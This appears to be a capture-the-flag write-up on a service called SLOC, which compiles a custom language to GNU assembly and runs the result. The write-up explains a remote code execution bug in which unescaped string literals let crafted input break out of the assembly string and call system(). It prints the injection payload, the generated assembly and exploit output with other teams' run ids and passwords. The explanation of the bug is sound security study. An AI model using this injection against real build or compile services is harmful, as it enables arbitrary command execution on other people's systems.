The challenge features a custom language compiler/preprocessor that generates GNU ASM source, compiles it and executes the resulting binary.
First bug that we exploited was an RCE leveraging non-escaped strings in generated assembly code.
SLOC source code that triggers the vulnerability:
CALL WRITECHAR "id\x00\"
CALL WRITECHAR ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"
([\r] should be replaced by the real \x0D characters — they will serve as whitespace for GAS)
Generated assembly code:
.global main
.text
main:
push %rbp
mov %rsp, %rbp
sub $0, %rsp
leaq string0(%rip), %rdi
call putchar@PLT
leaq string1(%rip), %rdi
call putchar@PLT
xor %rax, %rax
mov %rbp, %rsp
pop %rbp
ret
string0:
.asciz "id\x00\"
string1:
.asciz ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"
Let's re-format the bottom part slightly for it to be more obvious:
string0:
.asciz "id\x00\"\nstring1:\n.asciz "
string1:
putchar:
call system@PLT
call exit@PLT
#"
Thanks to \ injected in the string0, we break out of string literal, define putchar label that will be called instead of library function, and make it run our shell command.
The original PoC SLOC code and exploit code attached.
root@voshiba:~# ./splo.php 127.0.0.1
Welcome to SLOC - your Simple Language Online Compiler
What do you want to do?
1 <size>\n<code (size bytes) Compiles and runs your program
Prints the result and gives you an (id, pwd)
to get your out again later
2 <id> <pwd> Shows to result of the given run again
3 Lists all recent run ids
runs/bla:FAUST_blablablablaba
runs/test:FAUST_qweyqwieuywqiue
runs/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
runs/tmpxdkw8t_o3XO3TRUHN6CCAM2S:RX7QZWZIW66BDRNOruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiueruns/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
SUCC: Submission stored with id tmpcq_f5drkENYXKHEYE3AB6QW3 and pwd 3RUVNHAASYEWXGEA